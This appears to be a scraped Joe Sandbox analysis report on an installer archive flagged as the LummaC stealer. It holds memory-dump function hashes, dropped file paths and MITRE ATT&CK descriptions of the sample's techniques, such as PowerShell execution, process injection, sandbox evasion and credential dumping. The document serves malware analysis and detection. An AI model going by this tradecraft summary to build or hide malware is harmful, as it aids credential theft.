Opcode Fuzzy Hash: a830a10bd33750213a516007476775a966acc88ec4ee3725c2294069935f76b6
Instruction Fuzzy Hash: A001DC32300344AFDB09DA95EC15BAA7BA6EB89710F104129F6059F2A0DBB2E81597A5

Function 08AC88C0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ea51dd4a82667540f4f528a20c47b855344514fd52ed8e92b1c9adca8c24ac2
Instruction ID: b8d37908d8407ace1dd23da37e5bde7f38f7e8bb7356497c8ba5753c949e14a1
Opcode Fuzzy Hash: 7ea51dd4a82667540f4f528a20c47b855344514fd52ed8e92b1c9adca8c24ac2
Instruction Fuzzy Hash: 39F0F636205644AFDB02DF69C840E8ABFB6FF8E220F1581A6E9088B272D7758C11C761

Function 08AC82F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19dd1832327068b1e7047372f1d032ce8116785ef1c7ac3b88725276b9f0f9ca
Instruction ID: 3aebe1f043284a9ed4d74f71aa3b3d61b01d417fe36aeadd6cec9246958ff62c
Opcode Fuzzy Hash: 19dd1832327068b1e7047372f1d032ce8116785ef1c7ac3b88725276b9f0f9ca
Instruction Fuzzy Hash: E6014671D01618AFCF44DFA9D8048ADBFB4EF0C210B1080AAE944EB261E7344A10DFA1

Function 08AC8A20 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 586d786c069f0404d579dfb996adb2880508f7f80f350dfd513b221c7f91f357
Instruction ID: 999f44b2e0fec55d7ca2d2379592dfaaa47d99055bfa5d429ca6fb354b5a3f45
Opcode Fuzzy Hash: 586d786c069f0404d579dfb996adb2880508f7f80f350dfd513b221c7f91f357
Instruction Fuzzy Hash: 2DF0823A7012554BC719DA2AA44059AF7DAABC512170EC6BBC90DCBB00D979DC46CB90

Function 08AC8A10 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d429a3ccc3c57d848e59210f731fb0c50d00fc03727b587ce6a42c9f830443d
Instruction ID: 7320d003d0f666dac486374e17beb2dbade9d170827702d9fff4b792bb37bbfe
Opcode Fuzzy Hash: 5d429a3ccc3c57d848e59210f731fb0c50d00fc03727b587ce6a42c9f830443d
Instruction Fuzzy Hash: 1BF02B3A7093850FC715973A9840587FBDA9DC611130E85BFC944CF711C978DC05C7A1

Function 08AC8300 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6048f0fd83c73af01b7a528536265c74b76b35facf27447c9851eae54ac3415
Instruction ID: a0cb99104c3cad29951a0e0b90a4f1227a8ce40a4cbb83e0b152836ca7218c6f
Opcode Fuzzy Hash: b6048f0fd83c73af01b7a528536265c74b76b35facf27447c9851eae54ac3415
Instruction Fuzzy Hash: ECF0AF76E00219AF8F40DFA9D8049EEBBB5FB4C210B10842AE919E7350E7349A109F90

Function 08AC0A70 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e999cc01fc9bcc8214896ff2c537eaf9a0e6a5871d7050c43e2a15dc73e36ca
Instruction ID: b2e3ade1721844814ebf04eca9a7895e3d6d4214ee01bbb21814f200b0432362
Opcode Fuzzy Hash: 0e999cc01fc9bcc8214896ff2c537eaf9a0e6a5871d7050c43e2a15dc73e36ca
Instruction Fuzzy Hash: B4F0303620A540CFC705CB14D854A95BF70EF95221B15C0EAD559CB162C622D856DB51

Function 08AC0A07 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ddb4cd96119b37883e6c1afedfd5b13b55479877f1f92e63b68c5a30f37725a
Instruction ID: ac7d8611bd1d2f2320f490d1c538cef8e8a8ebcbbc5abe1c2f20ebb7816be6b8
Opcode Fuzzy Hash: 4ddb4cd96119b37883e6c1afedfd5b13b55479877f1f92e63b68c5a30f37725a
Instruction Fuzzy Hash: C5F0BC79A51504CFCB08CF69E480EA8B3B2FF98721B2140A9E915CB372CB31ED01CB90

Function 08AC69F1 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c6d6f17637a059429e82fe8b17797b8104bf84cff0fc331784bc94467939f4c
Instruction ID: 023ecafeb2cf94e9355d496d4e4fdfde5b2d41bcf249bf66e938b54f4d4f552a
Opcode Fuzzy Hash: 4c6d6f17637a059429e82fe8b17797b8104bf84cff0fc331784bc94467939f4c
Instruction Fuzzy Hash: 02E0DF362051406BE310079CE808BBB7A6ACBC9719F1880BFA1889B686C9A18C0183B0

Function 08AC6A00 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2362637232.0000000008AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_8ac0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9990fa3e5c4c1210b9f8ee84319b773f5b559e49542b21665505ec7c3ee63760
Instruction ID: 23e006a6961865d5d79085fbea948a63726f52dfe4a64bf81b059dc46763173f
Opcode Fuzzy Hash: 9990fa3e5c4c1210b9f8ee84319b773f5b559e49542b21665505ec7c3ee63760
Instruction Fuzzy Hash: 87D05E723015107BE314518EAC09FFBB2AECBCAB22F15C07AB2099B3818DA59C0143F0

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report installer_1.05_36.4.zip

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

C:\Users\user\AppData\Local\Temp\709182\N

C:\Users\user\AppData\Local\Temp\Bet

C:\Users\user\AppData\Local\Temp\Bmw

C:\Users\user\AppData\Local\Temp\Certificates

C:\Users\user\AppData\Local\Temp\Effective

C:\Users\user\AppData\Local\Temp\Exhibit

C:\Users\user\AppData\Local\Temp\Expected

C:\Users\user\AppData\Local\Temp\Expected.cmd (copy)

Windows Analysis Report
installer_1.05_36.4.zip

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre